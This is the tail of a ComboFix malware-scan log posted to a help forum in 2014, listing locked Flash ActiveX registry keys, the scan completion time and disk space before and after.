[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-21 01:41:59
ComboFix-quarantined-files.txt 2014-04-20 23:41
.
Vor Suchlauf: 23 Verzeichnis(se), 32.543.174.656 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 32.351.719.424 Bytes frei
.
- - End Of File - - 5DF84863D0CA34F0EF60B76EAB81F85C

Last edited by fxak (21.04.2014 at 00:52)